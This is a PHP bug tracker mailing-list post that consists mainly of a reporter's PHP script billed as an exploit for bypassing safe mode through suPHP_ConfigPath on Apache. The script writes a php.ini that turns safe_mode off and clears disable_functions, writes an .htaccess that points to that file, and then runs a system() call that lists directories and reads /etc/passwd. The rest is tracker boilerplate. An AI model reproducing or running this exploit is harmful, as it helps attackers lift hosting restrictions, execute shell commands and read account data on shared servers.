Bug #71095 [NEW]: Vulnerability Bypassing Safe Mode with Exploit in apache 1.x And 2.x

From: Date: Fri, 11 Dec 2015 14:55:15 +0000
Subject: Bug #71095 [NEW]: Vulnerability Bypassing Safe Mode with Exploit in apache 1.x And 2.x
Groups: php.standards 
Request: Send a blank email to standards-+get-919@lists.php.net to get a copy of this message
From: soufiane dot boussali at efet dot ac dot ma Operating system: multiple PHP version: 7.0.1RC1 Package: PHP Language Specification Bug Type: Bug Bug description:Vulnerability Bypassing Safe Mode with Exploit in apache 1.x And 2.x Description: ------------ apache 1.x <=> 2.x suphp (suPHP_ConfigPath) bypass safe mode exploit‎ <? /* apache 1.x <=> 2.x suphp (suPHP_ConfigPath) bypass safe mode exploit Author : Soufiane Boussali Facebook : fb.com/soufian.ckin2u */ echo "[+] Start... "; $bypfile=fopen(php.ini,w+); $stuffile=fopen(.htaccess,w+); if($bypfile and $stuffile!= NULL){ echo "[+] evil files created succes ! "; } else{ echo "[-] access denial ! "; } $byprullz1="safe_mode = OFF "; $byprullz2="disable_functions = NONE"; $dj=fwrite($bypfile,$byprullz1); $dj1=fwrite($bypfile,$byprullz2); fclose($bypfile); if($dj and $dj1!= NULL){ echo "[+] php.ini writed "; } else{ echo "[-] 404 php.ini not found ! "; } $breakrullz="suPHP_ConfigPath /home/user/public_html/php.ini"; // replace this /home/user/public_html by ur path $sf7=fwrite($stuffile,$breakrullz); fclose($stuffile); if($sf7!= NULL){ echo "[+] evil .htaccess writed "; echo "[+] exploited by success! "; echo " [+] discouvred by Hacker404 "; echo " [+] hackerone.com/hacker404 "; echo " [+] Facebook : fb.com/soufian.ckin2u "; } else{ echo "[-] evil .htaccess Not found! "; } system("pwd;ls -lia;uname -a;cat /etc/passwd"); #EOF ?> Risk : high Levele Soufiane Boussali Best Regards, -- Edit bug report at https://bugs.php.net/bug.php?id=71095&edit=1 -- Try a snapshot (PHP 5.4): https://bugs.php.net/fix.php?id=71095&r=trysnapshot54 Try a snapshot (PHP 5.5): https://bugs.php.net/fix.php?id=71095&r=trysnapshot55 Try a snapshot (trunk): https://bugs.php.net/fix.php?id=71095&r=trysnapshottrunk Fixed in SVN: https://bugs.php.net/fix.php?id=71095&r=fixed Fixed in release: https://bugs.php.net/fix.php?id=71095&r=alreadyfixed Need backtrace: https://bugs.php.net/fix.php?id=71095&r=needtrace Need Reproduce Script: https://bugs.php.net/fix.php?id=71095&r=needscript Try newer version: https://bugs.php.net/fix.php?id=71095&r=oldversion Not developer issue: https://bugs.php.net/fix.php?id=71095&r=support Expected behavior: https://bugs.php.net/fix.php?id=71095&r=notwrong Not enough info: https://bugs.php.net/fix.php?id=71095&r=notenoughinfo Submitted twice: https://bugs.php.net/fix.php?id=71095&r=submittedtwice register_globals: https://bugs.php.net/fix.php?id=71095&r=globals PHP 4 support discontinued: https://bugs.php.net/fix.php?id=71095&r=php4 Daylight Savings: https://bugs.php.net/fix.php?id=71095&r=dst IIS Stability: https://bugs.php.net/fix.php?id=71095&r=isapi Install GNU Sed: https://bugs.php.net/fix.php?id=71095&r=gnused Floating point limitations: https://bugs.php.net/fix.php?id=71095&r=float No Zend Extensions: https://bugs.php.net/fix.php?id=71095&r=nozend MySQL Configuration Error: https://bugs.php.net/fix.php?id=71095&r=mysqlcfg

« previous php.standards (#919) next »